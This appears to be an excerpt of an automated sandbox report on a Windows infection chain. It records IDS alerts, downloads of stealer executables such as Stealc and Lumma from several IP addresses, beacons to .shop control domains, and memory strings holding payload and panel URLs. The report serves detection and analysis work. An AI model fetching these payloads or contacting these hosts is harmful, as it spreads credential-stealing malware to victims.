                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49728 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49733 -> 185.215.113.117:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 185.215.113.117:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49744 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49749 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49759 -> 185.215.113.103:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49766 -> 185.215.113.103:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49753 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49774 -> 185.215.113.16:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49799 -> 185.215.113.103:80
                                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 185.215.113.16:80
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
                                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ballotnwu.site
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.117
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_0019A879 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,16_2_0019A879
                                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                  Source: global trafficHTTP traffic detected: GET /inc/gold.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /12dsvc.exe HTTP/1.1Host: 194.116.215.195
                                  Source: global trafficHTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
                                  Source: global trafficHTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /thebig/stories.exe HTTP/1.1Host: 176.113.115.95
                                  Source: global trafficHTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficHTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
                                  Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.103
                                  Source: global trafficHTTP traffic detected: GET /inc/neon.exe HTTP/1.1Host: 185.215.113.16
                                  Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
                                  Source: global trafficHTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $]q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\]q equals www.youtube.com (Youtube)
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`,]q equals www.youtube.com (Youtube)
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000002FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,]q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                                  Source: global trafficDNS traffic detected: DNS query: google.com
                                  Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
                                  Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
                                  Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
                                  Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
                                  Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
                                  Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
                                  Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
                                  Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
                                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                  Source: global trafficDNS traffic detected: DNS query: ballotnwu.site
                                  Source: global trafficDNS traffic detected: DNS query: youtube.com
                                  Source: global trafficDNS traffic detected: DNS query: www.youtube.com
                                  Source: global trafficDNS traffic detected: DNS query: www.google.com
                                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.95/thebig/stories.exe
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.95/thebig/stories.exe-1W
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.95/thebig/stories.exe11
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.95/thebig/stories.exeD
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.95/thebig/stories.exeebf0fv
                                  Source: axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/mine/random.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.103/steam/random.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/LummaC222222.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/LummaC222222.exeY5
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/crypted.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/crypted.exel&
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/needmoney.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.117/inc/needmoney.exeu5n
                                  Source: axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001620000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                                  Source: axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/cccc2.exeF
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/cccc2.exeL
                                  Source: axplong.exe, 00000006.00000003.2999105107.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/cccc2.exelF
                                  Source: axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/neon.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/newbundle2.exe
                                  Source: axplong.exe, 00000006.00000003.2999105107.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3054813558.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.0000000001671000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3140584868.000000000167D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.2999421029.0000000001677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/newbundle2.exe5
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/newbundle2.exeU:
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/penis.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exe
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/rstxdhuj.exez&
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/stealc_default2.exeG
                                  Source: axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/stealc_default2.exei
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000F8C000.00000004.00000001.01000000.00000012.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://185.215.113.17
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php3
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.php4
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpbird
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpf
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpinomi
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpp
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phption:
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/2fb6c2cc8dce150a.phpwser
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/freebl3.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/mozglue.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllpaFD
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/nss3.dllq&
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.17/oj
                                  Source: stealc_default2.exe, 00000013.00000002.2996721656.00000000010FD000.00000004.00000001.01000000.00000012.sdmpString found in binary or memory: http://185.215.113.172fb6c2cc8dce150a.phption:
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/15.113.26/y
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/3405117-2476756634-1003
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/6122658-3693405117-2476756634-1003
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000012.00000002.3336638317.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.php
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.php6
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.php65001
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpE
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpG
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpK
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpM
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpPROFILE=user-PCUSg
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpQ
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpW
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpWindows
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.26/Dem7kTu/index.phpWindows_NTPath=C:
